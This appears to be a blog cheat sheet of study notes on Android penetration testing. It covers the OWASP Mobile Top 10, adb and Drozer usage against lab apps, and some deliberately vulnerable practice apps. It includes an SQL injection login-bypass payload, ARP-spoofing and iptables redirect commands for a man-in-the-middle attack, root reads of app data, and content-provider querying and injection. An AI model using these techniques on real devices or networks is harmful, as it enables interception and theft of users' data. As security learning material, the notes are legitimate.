Android Pentest CheetSheet


These are the notes that I took while I was learning Android Pentest. Will updated some methodology in soon!


  • home
  • dialer
  • sms/mms
  • IM
  • browser
  • camera
  • alarm
  • calculator
  • contacts
  • voice
  • dial
  • email
  • calendar
  • media player
  • photo
  • album
  • clock


  • Activity Manager
  • Window Manager
  • Content Providers
  • View System
  • Notification Manager
  • Package Manager
  • Telephony Manager
  • Resource Manager
  • Location Manager


  • Surface Manager
  • Media Framework
  • SQLite
  • WebKite
  • Libc
  • OpenGLIES
  • Audio Manager
  • FreeType
  • SSL

Hardware Abstraction Layer

  • Graphics
  • Audio
  • Camera
  • Bluetooth
  • GPS
  • Radio(RIL)
  • Wifi

Linux Kernel

  • Display Driver
  • Camera Driver
  • Bluetooth Driver
  • Shared Memory Driver
  • Binder(IPC) Driver
  • USB Driver
  • Kernel Driver
  • Wifi Driver Audio Drivers
  • Power Managerment

Common Mobile Application Functions

  • Online Banking(Barclays)
  • Shopping(Amazon)
  • Social Network(Facebook)
  • Streaming(Skey go)
  • Gambling(Betfair)
  • Instant Messaging(Whatsapp)
  • Voice Chat(Skype)
  • Email(Gmail)
  • File sharing(Dropbox)
  • Games(angry bird)

Documents Stroage Applications allowing user to access sensitive business documents on demand

Travel and expenses applications allowing users to create , store and upload expenses to internal system

HR applications allowing user to access the payroll, time , slips , holiday, informations and other sensitive functionality

Internal service applications such as mobile applications that have been optimized to provide an internal resource such as the coperate internet

Internal instant messaging applications allowing users to chat in real time with other users regardless of location

Client Side Vulnerability

Insecure data storage

This category of the vulnerability incoperates the various defects that lead to an application’s stroing data on the mobile device in either cleartext and obfuscated format, using a hard-coded key , or any other means that can be trivially reversed by an attacker.

Insecure transmission of data

This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.

Lack of binary protections

This flaws means that an application does not employ any form of protection mechanism to complicate reverse engineering , malicious tampering or debugging.

Client-Side Injection

This category of vulnerability describes secnarios where untruested data is sent to an application and handled in unsafe manner . Typical origins of injection include other applications on the device and input populated into the application from the server.

Hard-coded password keys

This flaws arise when the developer embeds a sensitive piece of information such as password or an encryption key into the application.

Leakage of sensitive data

This involve cases where an application unintentionally leaks sensitive data though a side channel. This sepcifically includes data leakages that arise though use of a framework or OS and occur without the developer’s knowledge.

OWASP Mobile Top 10 risks from 2014

  • M1 – Weak Server-Side Control
  • M2 – Insecure Data Storage
  • M3 – Insufficient Data Storage
  • M4 – Unintended Data Leakage
  • M5 – Poor Authorization and Authentication
  • M6 – Broken Cryptography
  • M7 – Client Side Injection
  • M8 – Security Decisions via untrusted input
  • M9 – Improper session handling
  • M10- Lack of binary protections

OWASP Mobile Top 10 risks from 2016

  • M1 – Improper Platform Usage
  • M2 – Insecure Data Storage
  • M3 – Insecure Communication
  • M4 – Insecure Authentication
  • M5 – Insufficient Cryptography
  • M6 – Insecure Authorization
  • M7 – Client Code Quality
  • M8 – Code Tampering
  • M9 – Reverse Engineering
  • M10 – Extraneous Functionality

OWASP Top 10 mobile security tools

  • iMAS – Created by MITRE COPORTION, this project is an open source secure application framework for ios
  • GoatDroid – self‐contained training environment for Android applications.
  • iGoat – Similar to the goatdroid project
  • Damn Vulnerable IOS
  • MobiSec
  • Androick

Browser-based applications – The term describes applications that are usually a “mobile friendly” clone of the main site and loaded via the device’s browser.

Hybrid applications – The term refer to mobile applications that are a native wrapper for a webview and and often use a framework to access native device functionally.

Application Sandboxing

Each app runs inside it’s own sandbox.
One App cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.

Connecting to adb with bluestacks

adb connect localhost:5555
adb -s emulator-5554 shell

Start Learning OWASP Top 10 from 2014

M2-Insecure Data Storage

Android provides various ways to save app data.

It is up to the developer – What kind of data. How much data etc.

  • SharedPrefences
  • SQLite Databases
  • Internal Storage
  • External Storage
  • Using network connection


saving username and password without encrypting is not safe

OnePlus3T:/data/data/ # cat userdetails.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
    <string name="username">ist</string>
    <string name="password">ist</string>
OnePlus3T:/data/data/ #

SQLite databases

reading files from adb

adb shell "su -c cat /data/data/" > SQLINJECTION.db

M3-Insuffcient Transport Layer Protection

It is pretty common to exchange data between the Client and Server.
Many apps do not use SSL for transmitting data.
Many Apps trust Self Signed Certificates.
It is recommended to use certificates signed by a trusted CA provider
An attacker may evaesdrop to get sensitive data.

There are many possible attacks scenarios

Below are the few scenarios:

  • MITM with Burpsuite – Intercepting HTTP Traffic
  • MITM with Burpsuite – Intercepting SSL Traffic
  • Real world MITM attacks with arp spoofing
  • Passive data analysis with tcpdump and wireshark

MITM with Burpsuite – Intercepting HTTP Traffic

Configure the Proxy Server for bluestack

cd to bluestacks folder

C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 8080 connect to specified proxy
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset                   reset/stop using proxy

Vulnerable url –
sqli payload

x' or 'x'='x

MITM with Burpsuite – Intercepting SSL Traffic

just adding certificate

Real World MITM attacks with arp spoofing

echo "1" > /proc/sys/net/ipv4/ip_forward

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <lientenPort>

sudo -l <listenPort>

sudo arpspoof -i <interface> -t <targetip> <gateway>

M4-Unintended Data Leakage

When an application processes sensitive information taken as input from the user or any other source,it may result in placing data in an insecure location in the device.This insecure location could be accessible to other malicious apps running on the same device, thus leaving the device in a serious risk state.

  • URL Caching(Both Request and response)
  • Keyboard Press Caching
  • Copy/Paste Buffer Caching
  • Application backgrounding
  • Logging
  • HTML5 data storage
  • Browser cookie objects
  • Analytics data sent to 3rd parties

Unintended Data Leakage — Reading the clipboard

The software will paste the everything that u copy from anywhere.

That is the problem

Unintended Data Leakage — Logging

using logcat from adb

adb logcat | grep password

M5-Poor Authentication and Authorization

It has got various forms of attack vectors.

Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app’s code.

But, it is always recommended to all the processing at server side and then load data onto the mobile.

Due to usability requirements,mobile apps allow for passwords that are 4 digits long.

They can easily brute forced.

Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where hashes are stored is compromised.

M6-Broken Cryptography

the mobile app use the encryption and decrption that fundamentally falwed and can be exploited by the adversy to decrypt sensitive data.

Poor key Management Processes

Including the keys in the same attacker-readable directory as the encrypted content.

Avoid the use of hardcoded keys within the binary.

Creating custom encryption protocols

use apktool to decompile source code if there is any hash that can be cracked. It will be vulnerable to broken cryptography.

M7-Clientside Attack — SQL Injection at Client Side

x' or 'x'='x

and can easily bypass login without username and password

M7-Frame Injection in webviews

<iframe src="">

M8-Security Decisions via untrusted inputs — Intent Spoofing

The mobile application can accept data from all kinds of sources.
am – activity manager
it will be exported as True we can easily exploited

am start -n

M9-Improper Session Handling

Session related attacks come into picture if, the seesion id is compromised , or not invalidated properly in the backend. Insecure token creation and session timeouts are not implemented properly.

M10-Lack of Binary Exploitation

Reversing adnroid apps with APKTOOL
Reversing android apps with dex2jar
Exploiting debuggable apps using JDB

Setting Up Drozer

Drozer is a framework for Android Security assessments developed by MWR labs.

Drozer allow to assume the role of an Android app and to interact with other apps, through Android’s Inter-Process Communication(IPC) mechanism and the underlying operating system.

Has got nice modules such as leaking content providers, SQL Injection, LFI.
set up for port forwarding

adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect

Getting the list of all modules in drozer

dz> list

Getting the list of all packages installed

run app.package.list

to run specific package

run app.package.list -f challenge1

Getting package information

run -a [package name]
dz> run -a
  Application Label: Challenge1
  Process Name:
  Version: 1.0
  Data Directory: /data/user/0/
  APK Path: /data/app/
  UID: 10059
  GID: []
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None

Finding out the attack surface

run app.package.attacksurface [package name]
dz> run app.package.attacksurface
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable

Listing out activities in a package

run -a [packagename]

Finding the content providers of a package

run scanner.provider.finduris -a [packagename]

Querying content providers

run app.provider.query [URI]

Inserting data into content providers

run app.provider.insert [URI] [-type] column name [value]

Intent Spoofing with drozer

first it check the activity and just run activity

dz> run -a
    Permission: null
    Permission: null
dz> run app.activity.start --component

Exploiting Content Provider Leakage

Listing out activities in a package

run -a [package name]

Finding the secret content providers of a package.

run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider
Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://
Able to Query    content://
Able to Query    content://
Able to Query    content://

Accessible content URIs:
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://
Able to Query    content://
Able to Query    content://
Able to Query    content://

Accessible content URIs:
dz> run app.provider.query content://
| id | name | bankdetails |
dz> run app.provider.query content://
| id | name | bankdetails |

dz> run app.provider.query content://
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
OnePlus3T:/ $ content query --uri content://
Row: 0 id=1, name=ch4n, bankdetails=ch4n
OnePlus3T:/ $

SQL Injection Content Provider

dz> run scanner.provider.injection --uri content://
Not Vulnerable:
  No non-vulnerable URIs found.

Injection in Projection:

Injection in Selection:

Check sqli is vulnerable or not

dz> run app.provider.query content:// --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://
| id | name | bankdetails |
| 1  | ch4n | ch4n        |


Reversing App


Firebase Database Takeover Vulnerability



Highly recommend to check this one. It is free and super cool.







  • adb
  • jdgui
  • Frida
  • drozer
  • dex2jar
  • apktool
  • SQLite Browser
  • MobsF



Hackerone Android Report And Resources


Leave a Comment